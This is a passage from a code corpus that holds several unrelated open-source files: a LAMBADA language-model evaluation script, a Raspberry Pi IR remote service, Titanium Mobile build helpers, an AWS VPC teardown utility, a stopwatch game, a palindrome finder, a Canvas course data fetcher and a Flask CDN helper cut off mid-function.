# Conversely, with these models, the word pieces come at the end, so they must be suppressed
# at the beginning when we are trying to predict a word.
bad_words_ids = punctuation.copy() if suppress_punctuation else []
bad_words_ids += word_pieces
else:
bad_words_ids = punctuation if suppress_punctuation else None
fixed_negative_prompt = model.escape_prompt(fixed_negative_prompt)
def run_model(prompt):
output = model.generate(
prompt=prompt,
overlap_factor=overlap_factor,
tokenizer=tokenizer,
pad_token_id=0,
max_length=1,
repetition_penalty=repetition_penalty,
do_sample=False,
num_return_sequences=1,
bad_words_ids=bad_words_ids,
return_dict_in_generate=True,
output_scores=True,
)
output_sequences = output.sequences
if test_mode == 'word':
# Punctuation is not suppressed after the first token, since it provides one of the ways
# by which models can decide that the word has ended. The only straightforward way to implement
# this given how generate() is implemented is to call it twice.
guess_1 = output_sequences[0, -1]
tok_1 = tokenizer.decode([guess_1])
prompt_2 = '{' + prompt + '}' + tok_1
output_2 = model.generate(
prompt=prompt_2,
overlap_factor=overlap_factor,
tokenizer=tokenizer,
pad_token_id=0,
max_length=5,
repetition_penalty=repetition_penalty,
do_sample=False,
num_return_sequences=1,
return_dict_in_generate=True,
output_scores=True,
)
output_sequences = torch.cat([output_sequences, output_2.sequences], dim=1)
if test_mode == 'token':
guess = output_sequences[0, -1]
return guess
else:
n = output_sequences.shape[1]
j = 1 - word_piece_offset
while j < n - word_piece_offset and is_word_piece(output_sequences[0, j]):
j += 1
end = j + word_piece_offset
guess = output_sequences[0, :end].to('cpu')
return guess
sent_tokenizer = nltk.tokenize.punkt.PunktSentenceTokenizer()
if finetune_sentence_tokenizer:
f = open('../../data/gpt-2/data/lambada_development.jsonl')
text = []
for line in f.readlines():
text.append(json.loads(line)['text'] + ".")
text = '\n'.join(text)
# apply the same regularization used in split_last_sentence() before training
text = text.replace('\n', ' ').replace('  ', ' ').replace('“', '"').replace('”', '"').replace('’', '\'').replace('‘', '\'')
f.close()
sent_tokenizer.train(text)
def split_last_sentence(text):
# The following is necessary to get the sentence tokenizer to behave
regularized_text = text.replace('\n', ' ').replace('  ', ' ').replace('“', '"').replace('”', '"').replace('’', '\'').replace('‘', '\'')
sentences = sent_tokenizer.tokenize(regularized_text)
n = len(sentences[-1])
return text[:-(n+1)], text[-n:]
def interpret_line(line):
text = json.loads(line)['text']
if regularize_text:
text = text.replace('\n', ' ').replace('  ', ' ').replace('“', '"').replace('”', '"').replace('’', '\'').replace('‘', '\'')
# Separate the prompt from the desired output
ids = tokenizer.encode(text, add_special_tokens=False, return_tensors="pt")
if test_mode == 'token':
prompt = ids[0,:-1]
answer = ids[0,-1]
else:
n = ids.shape[1]
i = 1 + word_piece_offset
while i <= n:
if not is_word_piece(ids[0,-i]):
break
i += 1
i -= word_piece_offset
prompt = ids[0,:-i]
answer = ids[0,-i:]
prompt = tokenizer.decode(prompt)
prompt = model.escape_prompt(prompt)
if prompting_mode == 'default':
pass
elif prompting_mode == 'blank':
prompt = f'{prompt}~'
elif prompting_mode == 'fixed':
prompt = f'{prompt}~{fixed_negative_prompt}'
elif prompting_mode == 'word':
toks = nltk.word_tokenize(prompt)
last_tok = model.escape_prompt(toks[-1])
prompt = f'{prompt}~{prefix}{last_tok}'
elif prompting_mode == 'phrase':
phrases = re_phrase_boundary.split(prompt)
last_phrase = model.escape_prompt(phrases[-1])
prompt = f'{prompt}~{prefix}{last_phrase}'
elif prompting_mode == 'sentence':
first_sentences, last_sentence = split_last_sentence(prompt)
last_sentence = model.escape_prompt(last_sentence)
prompt = f'{prompt}~{prefix}{last_sentence}'
elif prompting_mode == 'sentence|blank':
first_sentences, last_sentence = split_last_sentence(prompt)
last_sentence = model.escape_prompt(last_sentence)
prompt = f'{prompt}~{prefix}{{{last_sentence}|}}'
elif prompting_mode == 'sentence|word':
_, last_sentence = split_last_sentence(prompt)
last_sentence = model.escape_prompt(last_sentence)
toks = nltk.word_tokenize(prompt)
last_tok = model.escape_prompt(toks[-1])
prompt = f'{prompt}~{prefix}{{{last_sentence}|{last_tok}}}'
elif prompting_mode == 'sentence|phrase':
_, last_sentence = split_last_sentence(prompt)
last_sentence = model.escape_prompt(last_sentence)
phrases = re_phrase_boundary.split(prompt)
last_phrase = model.escape_prompt(phrases[-1])
prompt = f'{prompt}~{prefix}{{{last_sentence}|{last_phrase}}}'
elif prompting_mode == 'sentence|word|phrase':
_, last_sentence = split_last_sentence(prompt)
last_sentence = model.escape_prompt(last_sentence)
toks = nltk.word_tokenize(prompt)
last_tok = model.escape_prompt(toks[-1])
phrases = re_phrase_boundary.split(prompt)
last_phrase = model.escape_prompt(phrases[-1])
prompt = f'{prompt}~{prefix}{{{last_sentence}|{last_tok}|{last_phrase}}}'
else:
raise ValueError("Unknown prompting mode!")
return text, prompt, answer
f = open('../../data/gpt-2/data/lambada_test.jsonl')
total_score = 0.0
texts = []
prompts = []
answers = []
for line in f.readlines():
text, prompt, answer = interpret_line(line)
texts.append(text)
prompts.append(prompt)
answers.append(answer)
n = 0
ncorrect = 0
for text, prompt, answer in zip(texts, prompts, answers):
guess = run_model(prompt)
n += 1
if model_type == 'ctrl' and test_mode == 'token':
guess = [guess]
answer = [answer]
if test_mode == 'token':
if model_type in ('xlm', 'ctrl'):
guess_text = tokenizer.decode(guess)
m = re_final_punct.match(guess_text)
if m:
guess_text = guess_text[:-len(m.group(1))]
answer_text = tokenizer.decode(answer)
correct = guess_text == answer_text
else:
correct = guess == answer
else:
if model_type in ('xlm', 'ctrl'):
guess_text = tokenizer.decode(guess)
m = re_first_punct_on.match(guess_text)
if m:
guess_text = guess_text[:-len(m.group(1))]
answer_text = tokenizer.decode(answer)
correct = guess_text == answer_text
else:
correct = guess.equal(answer)
if correct:
ncorrect += 1
if n % 100 == 0:
guess = tokenizer.decode(guess)
print('----------')
print(f'Text: {text}')
print(f'Guess: {guess} - {"correct" if correct else "wrong"} ({ncorrect}/{n} = {100*ncorrect/n})')
print(f'Final results: {ncorrect}/{n} = {100*ncorrect/n}')
```
|
{
"source": "jeff-blaisdell/raspberrypi-tv",
"score": 2
}
|
#### File: ir-service/web/devices.py
```python
import os.path
import yaml
from time import sleep
import subprocess
from not_found import NotFound
from execute_command_failure import ExecuteCommandFailure
from os import listdir
from os.path import isfile, join
commands_dir = "/var/data/ir-service/commands"
def list_devices():
return [f[:-4] for f in listdir(commands_dir) if isfile(join(commands_dir, f)) and f.endswith(".yml")]
def list_device_commands(device_id):
device_yml = "{}/{}.yml".format(commands_dir, device_id)
print("checking {} for device commands".format(device_yml))
if not (os.path.isfile(device_yml)):
raise NotFound("{} device not found".format(device_id))
with open(device_yml, 'r') as f:
return yaml.safe_load(f.read())
def get_device_command(device_id, command_id):
commands = list_device_commands(device_id)["commands"]
if not (command_id in commands):
raise NotFound("{} command not found for device {}".format(command_id, device_id))
return commands[command_id]
def execute_device_command(device_id, command_id):
command = get_device_command(device_id, command_id)
if isinstance(command, list):
for c in command:
if isinstance(c, str) and (c.startswith("wait ")):
millis = int(c[5:]) * 0.001
sleep(millis)
elif isinstance(c, dict):
remote = c["remote"]
key = c["key"]
result = subprocess.call(["irsend", "SEND_ONCE", remote, key])
if not result == 0:
raise ExecuteCommandFailure(
"Failed to execute action {} of command {} on device {}".format(c, command_id, device_id)
)
def execute(text):
lowercase_text = text.lower()
devices = [d for d in list_devices() if d in lowercase_text]
device = next(iter(devices or []), None)
if device:
commands = [c for c in list_device_commands(device)["commands"] if c in lowercase_text]
command = next(iter(commands or []), None)
if command:
execute_device_command(device, command)
return
raise NotFound("Device / Command not found for text {}".format(lowercase_text))
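# Illustrative sketch of a device file, e.g. /var/data/ir-service/commands/tv.yml
# (remote and key names are made up; the structure follows the parsing above):
#
# commands:
#   power_on:
#     - remote: samsung_tv
#       key: KEY_POWER
#     - wait 500
#     - remote: samsung_tv
#       key: KEY_HOME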
```
|
{
"source": "jeffbonnes/titanium_mobile",
"score": 2
}
|
#### File: titanium_mobile/apidoc/common.py
```python
import os, sys, re
simple_tag_pattern = re.compile(r"<[^>]*?>")
not_real_titanium_types = ("Titanium.Proxy", "Titanium.Module", "Titanium.Event")
DEFAULT_PLATFORMS = ["android", "blackberry", "iphone", "ipad", "mobileweb"]
platform_names = { "android": "Android", "blackberry": "BlackBerry",
"iphone": "iPhone", "ipad": "iPad", "mobileweb": "Mobile Web"}
initial_platform_version = { "blackberry": "3.1.2", "mobileweb" : "1.8"}
platform_namespaces = [ "Android", "iOS", "iPhone", "iPad", "MobileWeb", "BlackBerry" ]
# odict source is in docgen folder (parent of this folder).
# Newer versions of Python also have OrderedDict.
this_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.abspath(os.path.join(this_dir, "..")))
try:
from collections import OrderedDict
except:
from odict import odict as OrderedDict
## {{{ http://code.activestate.com/recipes/576720/ (r6)
## From <NAME>, licensed under MIT License
def lazyproperty(func):
"""A decorator for lazy evaluation of properties
"""
cache = {}
def _get(self):
try:
return cache[self]
except KeyError:
cache[self] = value = func(self)
return value
return property(_get)
## end of http://code.activestate.com/recipes/576720/ }}}
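# Example usage (a sketch; 'load_spec' is a hypothetical expensive call):
#   class Api(object):
#       @lazyproperty
#       def spec(self):
#           return load_spec()  # evaluated on first access, then cached per instance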
def strip_tags(value):
return simple_tag_pattern.sub("", value)
def dict_has_non_empty_member(d, member_name):
return member_name in d and d[member_name] is not None and len(d[member_name]) > 0
def to_ordered_dict(orig_dict, key_order):
already_added = []
odict = OrderedDict()
for key in key_order:
if key in orig_dict:
odict[key] = orig_dict[key]
already_added.append(key)
# Possible that not all keys were provided, so go thru orig
# dict and make sure all elements get in new, ordered dict
for key in orig_dict:
if not key in already_added:
odict[key] = orig_dict[key]
return odict
def pretty_platform_name(platform):
name = platform.lower()
if name in platform_names:
return platform_names[name]
else:
return name
def first_version_for_platform(platform):
name = platform.lower()
if name in initial_platform_version:
return initial_platform_version[name]
else:
return None
def is_platform_specific_namespace(name):
if any(map(lambda x: x in platform_namespaces, name.split("."))):
return True
return False
```
#### File: support/android/java.py
```python
import os, platform
def find_java_commands():
jarsigner = None
keytool = None
javac = None
java = None
environ_java_home = None
if os.environ.has_key("JAVA_HOME") and os.path.exists(os.environ["JAVA_HOME"]):
environ_java_home = os.environ["JAVA_HOME"]
java_home = environ_java_home
if platform.system() != "Windows":
# For Mac and Nix systems we just use the
# command name by itself.
jarsigner = "jarsigner"
keytool = "keytool"
javac = "javac"
java = "java"
else:
# Windows
if java_home:
home_jarsigner = os.path.join(java_home, "bin", "jarsigner.exe")
home_keytool = os.path.join(java_home, "bin", "keytool.exe")
home_javac = os.path.join(java_home, "bin", "javac.exe")
home_java = os.path.join(java_home, "bin", "java.exe")
if os.path.exists(home_jarsigner):
jarsigner = home_jarsigner
if os.path.exists(home_keytool):
keytool = home_keytool
if os.path.exists(home_javac):
javac = home_javac
if os.path.exists(home_java):
java = home_java
else:
for path in os.environ['PATH'].split(os.pathsep):
if os.path.exists(os.path.join(path, 'jarsigner.exe')) and os.path.exists(os.path.join(path, 'javac.exe')):
jarsigner = os.path.join(path, 'jarsigner.exe')
keytool = os.path.join(path, 'keytool.exe')
javac = os.path.join(path, 'javac.exe')
java = os.path.join(path, 'java.exe')
java_home = os.path.dirname(os.path.dirname(javac))
break
return {
"environ_java_home": environ_java_home,
"java_home": java_home,
"java": java,
"javac": javac,
"keytool": keytool,
"jarsigner": jarsigner
}
```
#### File: support/mobileweb/tiapp.py
```python
import os, types, uuid, codecs, time, sys
from xml.dom.minidom import parseString
ignore_nodes = ['android', 'iphone', 'deployment-targets']
def getText(nodelist):
rc = ''
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
rc = rc + node.data
rc = rc.strip()
if rc.lower() in ['true', 'yes', '1']:
rc = 'true'
elif rc in ['false', 'no', '0']:
rc = 'false'
return rc
class TiAppXML(dict):
def __init__(self, xml_file, deploytype, parse_only=False):
self['analytics'] = True
self['modules'] = []
self['build'] = {}
self['properties'] = {}
self['mobileweb'] = {
'analytics': {
'use-xhr': 'false'
},
'disable-error-screen': 'false',
'filesystem': {
'backend': 'Ti/_/Filesystem/Local',
'registry': 'ondemand'
},
'map': {
'backend': 'Ti/_/Map/Google',
'apikey': ''
},
'splash': {
'enabled': 'true',
'inline-css-images': 'true'
},
'theme': 'default'
}
self['precache'] = {
'images': [],
'includes': [],
'locales': [],
'requires': []
}
self['unsupported-platforms'] = {}
dom = parseString(codecs.open(xml_file,'r','utf-8','replace').read().encode('utf-8'))
root = dom.documentElement
for child in root.childNodes:
if child.nodeType == 1 and child.nodeName not in ignore_nodes:
if child.nodeName == 'modules':
for module in child.childNodes:
if module.nodeType == 1:
platform = module.getAttribute('platform')
if platform in ['', 'mobileweb', 'commonjs']:
self['modules'].append({
'id': getText(module.childNodes),
'version': module.getAttribute('version'),
'platform': platform
})
elif child.nodeName == 'mobileweb':
for node in child.childNodes:
if node.nodeType == 1:
if node.nodeName == 'precache':
for precache_node in node.childNodes:
if precache_node.nodeType == 1:
self[node.nodeName][precache_node.nodeName + 's'].append(getText(precache_node.childNodes))
elif node.nodeName == 'build':
for build_node in node.childNodes:
if build_node.nodeType == 1 and build_node.nodeName == deploytype:
for build_param_node in build_node.childNodes:
if build_param_node.nodeType == 1:
self[node.nodeName][build_param_node.nodeName] = getText(build_param_node.childNodes)
elif node.nodeName in self['mobileweb']:
if isinstance(self['mobileweb'][node.nodeName], dict):
for subnode in node.childNodes:
if subnode.nodeType == 1:
if subnode.nodeName in self['mobileweb'][node.nodeName]:
if isinstance(self['mobileweb'][node.nodeName][subnode.nodeName], dict):
for subsubnode in subnode.childNodes:
if subsubnode.nodeType == 1:
self['mobileweb'][node.nodeName][subnode.nodeName][subsubnode.nodeName] = getText(subsubnode.childNodes)
elif isinstance(self['mobileweb'][node.nodeName][subnode.nodeName], list):
self['mobileweb'][node.nodeName][subnode.nodeName].append(getText(subnode.childNodes))
else:
self['mobileweb'][node.nodeName][subnode.nodeName] = getText(subnode.childNodes)
else:
self['mobileweb'][node.nodeName][subnode.nodeName] = getText(subnode.childNodes)
elif isinstance(self['mobileweb'][node.nodeName], list):
self['mobileweb'][node.nodeName].append(getText(node.childNodes))
else:
self['mobileweb'][node.nodeName] = getText(node.childNodes)
else:
self['mobileweb'][node.nodeName] = getText(node.childNodes)
elif child.nodeName == 'property':
self['properties'][child.getAttribute('name')] = {
'type': child.getAttribute('type') or 'string',
'value': getText(child.childNodes)
}
else:
self[child.nodeName] = getText(child.childNodes)
# ensure we create a guid if the project doesn't already have one
if not parse_only and not self.has_key('guid'):
guid = uuid.uuid4().hex
self.guid = guid
n = dom.createElement("guid")
n.appendChild(dom.createTextNode(guid))
root.appendChild(n)
root.appendChild(dom.createTextNode("\n"))
dom.writexml(codecs.open(xml_file, 'w+','utf-8','replace'), encoding="UTF-8")
```
|
{
"source": "jeffbrl/aws-lambda-reference",
"score": 2
}
|
#### File: terraform-simple/source/main.py
```python
def add(event, context):
return event['a'] + event['b']
```
|
{
"source": "jeffbrl/aws-vpc-destroy",
"score": 3
}
|
#### File: jeffbrl/aws-vpc-destroy/vpc_destroy.py
```python
import argparse
import logging
import os
import time
import sys
import boto3
from botocore.exceptions import ClientError
logger = logging.getLogger("root")
FORMAT = "[%(filename)s:%(lineno)s - %(funcName)20s() ] %(message)s"
logging.basicConfig(format=FORMAT, level=logging.INFO)
def destroy_ec2(vpc_id, aws_region):
logger.debug(f"{vpc_id}")
ec2 = boto3.resource("ec2", region_name=aws_region)
ec2client = ec2.meta.client
# test for valid credentials
try:
ec2client.describe_vpcs()
except ClientError as e:
logging.info(e)
print(
"Either your credentials are invalid or your IAM user doesn't have permissions to list VPCs"
)
sys.exit(1)
if not vpc_exists(ec2client, vpc_id):
print(f"VPC {vpc_id} does not exist in {aws_region}")
return
vpc = ec2.Vpc(vpc_id)
# disassociate EIPs and release EIPs from EC2 instances
for subnet in vpc.subnets.all():
for instance in subnet.instances.all():
filters = [{"Name": "instance-id", "Values": [instance.id]}]
eips = ec2client.describe_addresses(Filters=filters)["Addresses"]
for eip in eips:
ec2client.disassociate_address(AssociationId=eip["AssociationId"])
ec2client.release_address(AllocationId=eip["AllocationId"])
# delete instances
filters = [
{"Name": "instance-state-name", "Values": ["running"]},
{"Name": "vpc-id", "Values": [vpc_id]},
]
ec2_instances = ec2client.describe_instances(Filters=filters)
instance_ids = []
for reservation in ec2_instances["Reservations"]:
instance_ids += [
instance["InstanceId"] for instance in reservation["Instances"]
]
logger.info(f"instance deletion list: {instance_ids}")
if instance_ids:
logging.info("Waiting for instances to terminate")
waiter = ec2client.get_waiter("instance_terminated")
ec2client.terminate_instances(InstanceIds=instance_ids)
waiter.wait(InstanceIds=instance_ids)
def destroy_services(vpc_id, aws_region, services):
services_map = {"ec2": destroy_ec2}
for service in services.split(","):
try:
services_map[service](vpc_id, aws_region)
except KeyError:
logger.error(f"destroying {service} not implemented")
def vpc_exists(ec2client, vpc_id):
try:
ec2client.describe_vpcs(VpcIds=[vpc_id])
except ClientError as e:
logging.info(e)
return False
return True
def delete_vpc(vpc_id, aws_region, release_eips=False):
ec2 = boto3.resource("ec2", region_name=aws_region)
ec2client = ec2.meta.client
if not vpc_exists(ec2client, vpc_id):
print(f"VPC {vpc_id} does not exist in {aws_region}")
return False
# Exit cleanly if the user did not specify at the command line to delete EC2 instances
# for a VPC with running instances
filters = [
{"Name": "instance-state-name", "Values": ["running"]},
{"Name": "vpc-id", "Values": [vpc_id]},
]
if ec2client.describe_instances(Filters=filters)["Reservations"]:
print(
f"Running EC2 instances exist in {vpc_id}. Please use --services ec2 to invoke the program."
)
return False
vpc = ec2.Vpc(vpc_id)
# delete transit gateway attachment for this vpc
# note - this only handles vpc attachments, not vpn
for attachment in ec2client.describe_transit_gateway_attachments()[
"TransitGatewayAttachments"
]:
if attachment["ResourceId"] == vpc_id:
ec2client.delete_transit_gateway_vpc_attachment(
TransitGatewayAttachmentId=attachment["TransitGatewayAttachmentId"]
)
# delete NAT Gateways
# attached ENIs are automatically deleted
# EIPs are disassociated but not released
filters = [{"Name": "vpc-id", "Values": [vpc_id]}]
for nat_gateway in ec2client.describe_nat_gateways(Filters=filters)["NatGateways"]:
ec2client.delete_nat_gateway(NatGatewayId=nat_gateway["NatGatewayId"])
# detach default dhcp_options if associated with the vpc
dhcp_options_default = ec2.DhcpOptions("default")
if dhcp_options_default:
dhcp_options_default.associate_with_vpc(VpcId=vpc.id)
# delete any vpc peering connections
for vpc_peer in ec2client.describe_vpc_peering_connections()[
"VpcPeeringConnections"
]:
if vpc_peer["AccepterVpcInfo"]["VpcId"] == vpc_id:
ec2.VpcPeeringConnection(vpc_peer["VpcPeeringConnectionId"]).delete()
if vpc_peer["RequesterVpcInfo"]["VpcId"] == vpc_id:
ec2.VpcPeeringConnection(vpc_peer["VpcPeeringConnectionId"]).delete()
# delete our endpoints
for ep in ec2client.describe_vpc_endpoints(
Filters=[{"Name": "vpc-id", "Values": [vpc_id]}]
)["VpcEndpoints"]:
ec2client.delete_vpc_endpoints(VpcEndpointIds=[ep["VpcEndpointId"]])
# delete custom security groups
for sg in vpc.security_groups.all():
if sg.group_name != "default":
sg.delete()
# delete custom NACLs
for netacl in vpc.network_acls.all():
if not netacl.is_default:
netacl.delete()
# ensure ENIs are deleted before proceeding
timeout = time.time() + 300
filters = [{"Name": "vpc-id", "Values": [vpc_id]}]
logger.debug("waiting for ENIs to delete before proceeding")
reached_timeout = True
while time.time() < timeout:
if not ec2client.describe_network_interfaces(Filters=filters)[
"NetworkInterfaces"
]:
logger.info(f"no ENIs remaining")
reached_timeout = False
break
else:
logger.info(f"waiting on ENIs to delete")
time.sleep(30)
if reached_timeout:
logger.debug(f"ENI deletion timed out")
# delete subnets
for subnet in vpc.subnets.all():
for interface in subnet.network_interfaces.all():
interface.delete()
subnet.delete()
# Delete routes, associations, and routing tables
filter = [{"Name": "vpc-id", "Values": [vpc_id]}]
route_tables = ec2client.describe_route_tables(Filters=filter)["RouteTables"]
for route_table in route_tables:
for route in route_table["Routes"]:
if route["Origin"] == "CreateRoute":
ec2client.delete_route(
RouteTableId=route_table["RouteTableId"],
DestinationCidrBlock=route["DestinationCidrBlock"],
)
for association in route_table["Associations"]:
if not association["Main"]:
ec2client.disassociate_route_table(
AssociationId=association["RouteTableAssociationId"]
)
ec2client.delete_route_table(
RouteTableId=route_table["RouteTableId"]
)
# delete routing tables without associations
for route_table in route_tables:
if route_table["Associations"] == []:
ec2client.delete_route_table(RouteTableId=route_table["RouteTableId"])
# destroy NAT gateways
filters = [{"Name": "vpc-id", "Values": [vpc_id]}]
nat_gateway_ids = [
nat_gateway["NatGatewayId"]
for nat_gateway in ec2client.describe_nat_gateways(Filters=filters)[
"NatGateways"
]
]
for nat_gateway_id in nat_gateway_ids:
ec2client.delete_nat_gateway(NatGatewayId=nat_gateway_id)
# detach and delete all IGWs associated with the vpc
for gw in vpc.internet_gateways.all():
vpc.detach_internet_gateway(InternetGatewayId=gw.id)
gw.delete()
ec2client.delete_vpc(VpcId=vpc_id)
return True
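# Example invocation (a sketch; the VPC id is made up):
#   python vpc_destroy.py --vpc_id vpc-0a1b2c3d4e5f67890 --region us-east-1 --services ec2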
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser._action_groups.pop()
required = parser.add_argument_group("required arguments")
optional = parser.add_argument_group("optional arguments")
required.add_argument("--vpc_id", required=True, help="Please include your vpc_id")
optional.add_argument(
"--services", help="comma-separated list of AWS services to tear down"
)
optional.add_argument("--region", help="AWS region")
args = parser.parse_args()
if args.region:
aws_region = args.region
else:
aws_region = os.environ["AWS_DEFAULT_REGION"]
vpc_id = args.vpc_id
print(f"type: {type(vpc_id)}")
if args.services:
logger.info(f"calling destroy_services with {args.services}")
destroy_services(args.vpc_id, aws_region, args.services)
logger.info(f"calling delete_vpc with {vpc_id}")
if delete_vpc(vpc_id=vpc_id, aws_region=aws_region, release_eips=False):
print(f"destroyed {vpc_id} in {aws_region}")
else:
print(f"unable to destroy {vpc_id} in {aws_region}")
```
|
{
"source": "jeffbrl/terraform-examples",
"score": 2
}
|
#### File: terraform-examples/lambda-vpc/lambda.py
```python
def lambda_handler(event, context):
print("Hello from Lambda")
```
|
{
"source": "jeffbrown3340/python-stopwatch",
"score": 3
}
|
#### File: jeffbrown3340/python-stopwatch/stopwatch-completed.py
```python
import simplegui
import math
import time
# define global variables
t = 0
status_message_xpos = 35
status_message = ""
points = 0
tries = 0
max_tries = 5
# define helper function format that converts time
# in tenths of seconds into formatted string A:BC.D
def format(t):
# t is count of tenths of seconds
# calculate remainder tenths, which is the ones position
tenths = t % 10
# take away the tenths, divide by tenths per minute (10*60) rounded down
# coercing to int for display purposes in the string build
minutes = int(math.floor((t - tenths)/(10 * 60)))
# take away minutes and tenths, remainder is secs * 10 centisec/sec
seconds = int((t - (minutes * 60 * 10) - tenths) / 10)
# build the returned string from right to left
string_to_return = "." + str(tenths) #decimal point and tenths
string_to_return = str(seconds) + string_to_return #seconds
if seconds < 10:
string_to_return = "0" + string_to_return # pad zero to single digit
string_to_return = ":" + string_to_return
string_to_return = str(minutes) + string_to_return
return string_to_return
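# Worked example: format(754) returns "1:15.4" (754 tenths = 1 minute, 15 seconds, 4 tenths)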
# define event handlers for buttons; "Start", "Stop", "Reset"
def start_button():
global t, status_message, status_message_xpos
if tries >= max_tries:
status_message_xpos = 65
status_message = "Game over, hit Reset."
else:
timer.start()
status_message = ""
def stop_button():
global t, tries, points, status_message, status_message_xpos
if timer.is_running():
timer.stop()
tries += 1
status_message_xpos = 75
if t % 10 == 0:
points += 1
status_message = "You scored a point!"
else:
if tries >= max_tries:
status_message_xpos = 30
status_message = "Oops! Game over, hit Reset."
else:
status_message_xpos = 75
status_message = "Oops ... try Again."
def reset_button():
global t, tries, points, status_message
timer.stop()
t = 0
tries = 0
points = 0
status_message = ""
# define event handler for timer with 0.1 sec interval
def timer_event_handler():
global t
t += 1
# reset to zero after 9:59.9
if t > (10 * 60 * 10) - 1:
t = 0
# define draw handler
def draw_handler(canvas):
canvas.draw_text(str(points) + "/" + str(tries), [250,25], 24, "Yellow")
canvas.draw_text(format(t), [100,112], 48, "White")
canvas.draw_text(status_message, [status_message_xpos,190], 24, "Red")
# create frame
frame = simplegui.create_frame("Stopwatch", 325, 200)
timer = simplegui.create_timer(100, timer_event_handler)
# register event handlers
frame.set_draw_handler(draw_handler)
frame.add_button("Start",start_button)
frame.add_button("Stop",stop_button)
frame.add_button("Reset",reset_button)
# start frame
frame.start()
```
|
{
"source": "jeff-brown/next",
"score": 4
}
|
#### File: jeff-brown/next/next.py
```python
import sys
def next_palindrome(num):
"""
function to figure out the next palindrome given any starting value
args:
num(int): the starting number
returns:
the next palindrome
"""
length = len(str(num))
odd_digits = (length % 2 != 0)
left_half = get_left_half(num)
middle = get_middle(num)
if odd_digits:
increment = pow(10, length // 2)
new_num = int(left_half + middle + left_half[::-1])
else:
increment = int(1.1 * pow(10, length // 2))
new_num = int(left_half + left_half[::-1])
if new_num > num:
return new_num
if middle != '9':
return new_num + increment
return next_palindrome(round_up(num))
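# Worked example: next_palindrome(123) -> 131
#   left_half = "1", middle = "2"; the mirror 121 is not greater than 123,
#   so the middle digit is bumped by the increment (10), giving 131.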
def get_left_half(num):
"""
function to get the left half of a string representation of a starting
numerical value.
"""
return str(num)[:len(str(num)) // 2]
def get_middle(num):
"""
function to get the middle of a string representation of a starting
numberical value
"""
# (len(str(num)) - 1) / 2
return str(num)[int((len(str(num)) - 1) / 2)]
def round_up(num):
"""
round up the starting value to the nearest whole number ending in zero
"""
length = len(str(num))
increment = pow(10, ((length // 2) + 1))
return ((num // increment) + 1) * increment
def main():
"""
the main function calls the next_palindrome function and prints the result
"""
num = int(sys.argv[1])
palindrome = next_palindrome(num)
print(
"With a starting value of {}, the next palindrome is {}.".format(
num, palindrome
)
)
return 0
if __name__ == '__main__':
sys.exit(main())
```
|
{
"source": "jeffbulmer/team-formation-script",
"score": 2
}
|
#### File: jeffbulmer/team-formation-script/fetch_data.py
```python
import canvasapi
import click
from team_formation import config
from team_formation.data_helpers import process_canvas_course, process_canvas_sections, \
process_canvas_students
from team_formation.prompts import course_prompt
@click.command()
@click.option('--store_data',
default=False,
is_flag=True,
help='Store data fetched into `.csv` files. [default: False]',
envvar='CANVAS_STORE_DATA_LOCALLY')
@click.option('--course_id',
help='Canvas Course ID.',
type=int,
envvar='CANVAS_COURSE_ID')
@click.option('--token',
prompt=False,
default=config.TOKEN,
hide_input=True,
help='Canvas API token.',
required=True,
envvar='CANVAS_API_TOKEN')
@click.option('--url',
default='https://canvas.ubc.ca',
# default='https://ubc.test.instructure.com',
help='Canvas Url. [default: https://canvas.ubc.ca]',
# help='Canvas Url. [default: https://ubc.test.instructure.com]',
required=True,
envvar='CANVAS_BASE_URL')
def fetch_data(url, token, course_id, store_data):
config.STORE_DATA_LOCALLY = store_data
_fetch_data(url, token, course_id)
def _fetch_data(url, token, course_id):
canvas = canvasapi.Canvas(url, token)
data = {}
if not course_id:
# prompt user to select a course they have access to (paginated)
course_id = course_prompt(canvas)
# get course by id
course = canvas.get_course(course_id, include=['total_students'])
data['course_df'] = process_canvas_course(course)
sections = course.get_sections(include=['students'], per_page=config.PER_PAGE)
data['sections_df'] = process_canvas_sections(sections)
students = course.get_users(enrollment_type=['student'], enrollment_state=['active'], per_page=config.PER_PAGE)
data['students_df'] = process_canvas_students(students)
modules = course.get_modules()
for module in modules:
module_items = module.get_module_items()
module_items = [module_item for module_item in module_items]
for mi in module_items:
print(mi)
return (course, data)
def fetch_student_survey_data(course, student_id, quiz_id):
survey = course.get_quiz(quiz_id)
students = course.get_users(enrollment_state=['active']);
student = None;
for s in students:
if(s.id == student_id):
student = s;
break
submissions = survey.get_submissions()
submission = None
for x in submissions:
if(x.user_id == student_id):
submission = x
break;
q_data=[]
if(submission is None):
return None
for y in submission.get_submission_events():
if(y.event_type == 'question_answered'):
q_data += y.event_data
read_data = [];
for z in q_data:
# print(z);
q = survey.get_question(int(z['quiz_question_id'])).question_text
for a in survey.get_question(int(z['quiz_question_id'])).answers:
#handle multiple dropdowns separately
if type(z['answer']) is dict:
for e in z['answer']:
if z['answer'][e] is None:
continue;
elif z['answer'] is not None and a['id'] == int(z['answer']):
# print({'Question':q,'Answer':a['text']})
read_data.append({'Question':q,'Answer':a['text']});
break;
if(student is None):
name = "Test"
else:
name = student.name
return {'student_name':name, 'quiz':survey.title, 'answers': read_data}
# def fetch_all_survey_data(course, quiz_id):
if __name__ == '__main__':
fetch_data()
```
|
{
"source": "jeffbuswell/flask-cdn",
"score": 3
}
|
#### File: jeffbuswell/flask-cdn/flask_cdn.py
```python
import os
from flask import url_for as flask_url_for
from flask import current_app, request
def url_for(endpoint, **values):
"""
Generates a URL to the given endpoint.
If the endpoint is for a static resource then a URL to the CDN is
generated, otherwise the call is passed on to `flask.url_for`.
Because this function is set as a jinja environment variable when
`CDN.init_app` is invoked, this function replaces `flask.url_for` in
templates automatically. It is unlikely that this function will need to be
directly called from within your application code, unless you need to refer
to static assets outside of your templates.
"""
app = current_app
if app.config['CDN_DEBUG']:
return flask_url_for(endpoint, **values)
def endpoint_match(endpoint):
if endpoint in app.config['CDN_ENDPOINTS']:
return True
for x in app.config['CDN_ENDPOINTS']:
if endpoint.endswith('.%s' % x):
return True
return False
if endpoint_match(endpoint):
try:
scheme = values.pop('_scheme')
except KeyError:
scheme = 'http'
cdn_https = app.config['CDN_HTTPS']
if cdn_https is True or (cdn_https is None and request.is_secure):
scheme = 'https'
static_folder = app.static_folder
if (request.blueprint is not None and
request.blueprint in app.blueprints and
app.blueprints[request.blueprint].has_static_folder):
static_folder = app.blueprints[request.blueprint].static_folder
urls = app.url_map.bind(app.config['CDN_DOMAIN'], url_scheme=scheme)
